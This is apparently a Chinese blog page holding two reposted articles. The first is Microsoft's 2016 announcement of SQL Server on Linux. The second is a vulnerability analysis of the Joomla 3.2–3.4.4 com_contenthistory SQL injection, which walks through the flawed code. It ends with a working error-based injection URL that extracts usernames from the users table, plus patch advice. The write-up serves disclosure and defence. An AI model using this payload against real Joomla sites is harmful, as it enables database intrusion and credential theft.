從封閉心態的Microsoft走向擁抱世界的開放態度

從改變產品的布局即可一窺端倪

Azure一推出就支援Linux系統

一些產品像是Office365可安裝在iOS及Andriod等行動平台

微軟正在逐漸改變:)

It’s been an incredible year for the data business at Microsoft and an incredible year for data across the industry. This Thursday at our Data Driven event in New York, we will kick off a wave of launch activities for SQL Server 2016 with general availability later this year. This is the most significant release of SQL Server that we have ever done, and brings with it some fantastic new capabilities. SQL Server 2016 delivers:

• Groundbreaking security encryption capabilities that enable data to always be encrypted at rest, in motion and in-memory to deliver maximum security protection
• In-memory database support for every workload with performance increases up to 30-100x
• Incredible Data Warehousing performance with the #1, #2 and #3 TPC-H 10 Terabyte benchmarks for non-clustered performance, and as of March 7, the #1 SAP SD Two-Tier performance benchmark on Windows¹
• Business Intelligence for every employee on every device – including new mobile BI support for iOS, Android and Windows Phone devices
• Advanced analytics using our new R support that enables customers to do real-time predictive analytics on both operational and analytic data
• Unique cloud capabilities that enable customers to deploy hybrid architectures that partition data workloads across on-premises and cloud based systems to save costs and increase agility

These improvements, and many more, are all built into SQL Server and bring you not just a new database but a complete platform for data management, business analytics and intelligent apps – one that can be used in a consistent way across both on-premises and the cloud. In fact, over the last year we’ve been using the SQL Server 2016 code-base to run in production more than 1.4 million SQL Databases in the cloud using our Azure SQL Database as a Service offering, and this real-world experience has made SQL Server 2016 an incredibly robust and battle-hardened data platform.

Gartner recently named Microsoft as leading the industry in their Magic Quadrant for Operational Database Management Systems in both execution and vision. We’re also a leader in Gartner’s Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics, and Magic Quadrant for Business Intelligence and Analytics Platforms, as well as leading in vision in the Magic Quadrant for Advanced Analytics Platforms.

Extending SQL Server to Also Now Run on Linux

Today I’m excited to announce our plans to bring SQL Server to Linux as well. This will enable SQL Server to deliver a consistent data platform across Windows Server and Linux, as well as on-premises and cloud. We are bringing the core relational database capabilities to preview today, and are targeting availability in mid-2017.

SQL Server on Linux will provide customers with even more flexibility in their data solution. One with mission-critical performance, industry-leading TCO, best-in-class security, and hybrid cloud innovations – like Stretch Database which lets customers access their data on-premises and in the cloud whenever they want at low cost – all built in.

“This is an enormously important decision for Microsoft, allowing it to offer its well-known and trusted database to an expanded set of customers”, said Al Gillen, group vice president, enterprise infrastructure, at IDC. “By taking this key product to Linux Microsoft is proving its commitment to being a cross platform solution provider. This gives customers choice and reduces the concerns for lock-in. We would expect this will also accelerate the overall adoption of SQL Server.”

“SQL Server’s proven enterprise experience and capabilities offer a valuable asset to enterprise Linux customers around the world,” said Paul Cormier, President, Products and Technologies, Red Hat. “We believe our customers will welcome this news and are happy to see Microsoft further increasing its investment in Linux. As we build upon our deep hybrid cloud partnership, spanning not only Linux, but also middleware, and PaaS, we’re excited to now extend that collaboration to SQL Server on Red Hat Enterprise Linux, bringing enterprise customers increased database choice.”

“We are delighted to be working with Microsoft as it brings SQL Server to Linux,” said Mark Shuttleworth, founder of Canonical. “Customers are already taking advantage of Azure Data Lake services on Ubuntu, and now developers will be able to build modern applications that utilize SQL Server’s enterprise capabilities.”

Bringing SQL Server to Linux is another way we are making our products and new innovations more accessible to a broader set of users and meeting them where they are. Just last week, we announced our agreement to acquire Xamarin. Recently, we alsoannounced Microsoft R Server , our technologies based on our acquisition of Revolution Analytics, with support for Hadoop and Teradata.

The private preview of SQL Server on Linux is available starting today and we look forward to working with the community, our customers and our partners to bring it to market.

Please join me Satya Nadella, Joseph Sirosh and Judson Althoff at our Data Driven event on Thursday to hear more about this news and how Microsoft is helping customers transform their business using data.

Thanks,
Scott

To find out more about SQL Server on Linux, you can sign up to get regular updates and provide input to the team.

1 Benchmark Certification #2016002: Two-tier configured SAP SD Standard Application Benchmark. Using SAP ERP 6.0 Enhancement Package 5, achieving the results of 100000 SD benchmark users using HPE Integrity Superdome X, 16 processors/288 cores/576 threads Intel E7-8890 v3 with 4096GB of main memory. Operating System: Windows Server 2012R2 with SQL Server 2014 Enterprise Edition as DBMS. For more details see: http://www.sap.com/benchmark.

[1] Gartner “Magic Quadrant for Operational Database Management Systems,” by Donald Feinberg , Merv Adrian , Nick Heudecker, October 2015
[2] Gartner “Magic Quadrant for Data Warehouse and Data Management Solutions for Analytics,” by Roxane Edjlali and Mark Beyer, Feb 2016
[3] Gartner “Magic Quadrant for Business Intelligence and Analytics Platforms,” by Josh Parenteau, Rita L. Sallam,  Cindi Howson  Joao Tapadinhas, Kurt Schlegel, Thomas W. Oestreich February 2016
[4] Gartner “Magic Quadrant for Advanced Analytics Platforms,” by Lisa Kart, Gareth Herschel, Alexander Linden, Jim Hare, February 2016

The above graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Microsoft. Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

文章來源:https://blogs.microsoft.com/blog/2016/03/07/announcing-sql-server-on-linux/

圖片來源:https://pixabay.com/

The post Announcing SQL Server on Linux first appeared on 捕夢網 Blog.

0x01 原理分析

在Joomla CMS中有一個查看歷史編輯版本的元件(com_contenthistory)，該功能照理應該只有管理員才能使用，但是由於開發人員的疏忽，導致該功能不需要特別的權限就能夠使用。通過訪問/index.php?option=com_contenthistory可以使得服務端載入歷史版本處理元件。程式流程會轉到/components/com_contenthistory/contenthistory.php文件中：

<?php
defined('_JEXEC') or die;    
 
$lang = JFactory::getLanguage();
$lang->load('com_contenthistory', JPATH_ADMINISTRATOR, null, false, true)
||    $lang->load('com_contenthistory', JPATH_SITE, null, false, true);    
 
require_once JPATH_COMPONENT_ADMINISTRATOR . '/contenthistory.php';

可以看到該元件載入時並沒有進行相關權限的監測，而Joomla中，一般的後台調用元件 (/administrator/components/下的元件) 都會進行元件對應的權限檢查，例如後台中的com_contact 元件

if (!JFactory::getUser()->authorise('core.manage', 'com_contact'))
{
    return JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR'));
}

但是，程式在處理contenthistory元件時，並沒有檢查權限，程式初始化並設置好元件相關配置後，包含檔案/administrator/components/com_contenthistory/contenthistory.php，其內容如下：

<?php
defined('_JEXEC') or die;    
 
$controller = JControllerLegacy::getInstance('Contenthistory', array('base_path' => JPATH_COMPONENT_ADMINISTRATOR));
$controller->execute(JFactory::getApplication()->input->get('task'));
$controller->redirect();

程式初始化基於 contenthistory 元件的控制類 JControllerLegacy，然後直接調用控制類的 execute() 方法，在 execute() 方法中，會調用其控制類中的 display()，代碼位於 /libraries/legacy/controller/legacy.php：

public function display($cachable = false, $urlparams = array())
{
    $document = JFactory::getDocument();
    $viewType = $document->getType();
    $viewName = $this->input->get('view', $this->default_view);
    $viewLayout = $this->input->get('layout', 'default', 'string');    
 
    $view = $this->getView($viewName, $viewType, '', array('base_path' => $this->basePath, 'layout' => $viewLayout));    
 
    // Get/Create the model
    if ($model = $this->getModel($viewName))
    {
        // Push the model into the view (as default)
        $view->setModel($model, true);
    }
    (...省略...)
    if ($cachable && $viewType != 'feed' && $conf->get('caching') >= 1)
    { (...省略...) }
    else
    {
        $view->display();
    }    
 
    return $this;
}

處理常式從傳遞的參數中獲取 view 和 layout 的參數值進行初始化視圖，並且調用 $model = $this->getModel($viewName) 載入對應資料模型，最終會調用 $view->display() 函數進行視圖處理。

Joomla 新版本 3.4.5 中修復的SQL注入漏洞涉及的是歷史查看操作，也就是 view=history 時的程式處理會導致注入。在程式進行資料提取時，會進入 /administrator/components/com_contenthistory/models/history.php 檔中的 getListQuery() 函數：

protected function getListQuery()
{
    // Create a new query object.
    $db = $this->getDbo();
    $query = $db->getQuery(true);    
 
    // Select the required fields from the table.
    $query->select(
        $this->getState(
            'list.select',
            'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
            'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
        )
    )
    ->from($db->quoteName('#__ucm_history') . ' AS h')
    ->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
    ->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))    
 
    // Join over the users for the editor
    ->select('uc.name AS editor')
    ->join('LEFT', '#__users AS uc ON uc.id = h.editor_user_id');    
 
    // Add the list ordering clause.
    $orderCol = $this->state->get('list.ordering');
    $orderDirn = $this->state->get('list.direction');
    $query->order($db->quoteName($orderCol) . $orderDirn);    
 
    return $query;
}

注意下面這段SQL語句構造部分：

$query->select(
    $this->getState(
        'list.select',
        'h.version_id, h.ucm_item_id, h.ucm_type_id, h.version_note, h.save_date, h.editor_user_id,' .
        'h.character_count, h.sha1_hash, h.version_data, h.keep_forever'
    )
)
->from($db->quoteName('#__ucm_history') . ' AS h')
->where($db->quoteName('h.ucm_item_id') . ' = ' . $this->getState('item_id'))
->where($db->quoteName('h.ucm_type_id') . ' = ' . $this->getState('type_id'))

其中 getState() 函數用於獲取模型的屬性和其對應的值，其函式定義位於 /ibraries/legacy/model/legacy.php：

public function getState($property = null, $default = null)
{
    if (!$this->__state_set)
    {
        // Protected method to auto-populate the model state.
        $this->populateState();    
 
        // Set the model state set flag to true.
        $this->__state_set = true;
    }    
 
    return $property === null ? $this->state : $this->state->get($property, $default);
}

然後會調用 populateState() 函數來初始化參數值和提取並過濾某些參數，在 contenthistory 組建中定義有自己的 populateState() 函數：

protected function populateState($ordering = null, $direction = null)
{
    (...省略...)
    // List state information.
    parent::populateState('h.save_date', 'DESC');
}

函數最後，會調用父類的 populateState() 函數，因為該資料模型繼承於 JModelList，所以父類相關代碼位於 /libraries/legacy/model/list.php 中，而在父類該函數的處理中會解析請求中傳遞的 list[] 參數，解析並過濾預設鍵的值，但是卻忽略了 list[select]：

protected function populateState($ordering = null, $direction = null)
{
    (...省略...)
        // Receive & set list options
        if ($list = $app->getUserStateFromRequest($this->context . '.list', 'list', array(), 'array'))
        {
            foreach ($list as $name => $value)
            {
                // Extra validations
                switch ($name)
                {
                    case 'fullordering':
                        (...省略...)
                    case 'ordering':
                        (...省略...)
                    case 'direction':
                        (...省略...)
                    case 'limit':
                        (...省略...)
                    default:
                        $value = $value;
                        break;
                }    
 
                $this->setState('list.' . $name, $value);
            }
        }
    (...省略...)

而傳遞 list[select] 參數值最終會被解析到上述元件視圖進行處理時 SQL 語句構建中的 list.select 裡，從而導致了注入。

0x02 漏洞演示

通過上面簡單的分析，已經知道了受影響的Joomla版本中，contenthistory元件訪問不受許可權的控制，並且當進行view=history請求時會解析請求參數中 list[select] 的值拼接到SQL語句中。下面是該漏洞的簡單驗證和利用方法。

1.漏洞驗證

http://http://172.16.96.130/xampp/Joomla-3.4.4/index.php?option=com_contenthistory&view=history&list[select]=1

因為在進行 SQL 語句拼接的時候，獲取了 list.ordering 進行資料查詢中的 order 操作，若不提供默認會將其設置為資料進行處理，相關處理位於 /libraries/joomla/database/driver.php 的 quoteName() 函數中。

因此，訪問上述構造的URL，伺服器會報錯：

2.漏洞利用

因為在 SQL 語句拼接時，程式框架針對每個 from 或者 where 操作進行了換行處理，所以這裡並不能使用 #、– 等符號來注釋掉後面的語句，只能通過報錯注入進行資料提取。但是語句的成功執行有一定的前提條件，也就是傳遞的 item_id 和 type_id 參數值必須於資料庫中有效，同時傳遞 list[ordering] 參數 (空值即可)，這樣注入的語句才能夠得到執行，從而進行報錯注入。

這裡經過多個漏洞網站的測試可以簡單的使用 item_id=1&type_id=1，當然了為了準確性和有效性，可以通過爆破的方式來得到這兩個參數的有效值，然後再進行注入操作。

(Tips：Joomla 中構造的 SQL 語句中 #_ 最終會在執行前被替換為表首碼)

下面是獲取用戶名/密碼雜湊的漏洞演示過程：

http://http://172.16.96.130/xampp/Joomla-3.4.4/index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[ordering]&list[select]=(select 1 from (select count(),concat((select username from %23__users limit 0,1),floor(rand(0)2)) from information_schema.tables group by 2)x)

0x03 修復方案

從 https://github.com/joomla/joomla-cms/releases 獲取最新版本進行重新安裝；

從 https://github.com/joomla/joomla-cms/releases 下載相應版本的補丁程式進行升級；

0x04 總結

就 Joomla CMS 的用戶量來看，目前還有大量的網站的資料正受到該漏洞的威脅。該漏洞的產生本質上是由於存取控制的缺失和過濾不嚴格造成。存取控制的缺失導致本應只有管理員才能進行訪問和載入的 contenthistory 元件能夠被任意使用者訪問和載入，而參數的過濾不嚴格，導致攻擊者能夠構造出惡意的參數到執行流中產生注入。

原文地址：http://blog.knownsec.com/2015/10/joomla-cms-3-2-3-4-4-sql-injection-vulnerability/

文章來源:http://drops.wooyun.org/papers/9979

圖片來源:https://pixabay.com/

The post Joomla CMS 3.2-3.4.4 SQL注入 漏洞分析 first appeared on 捕夢網 Blog.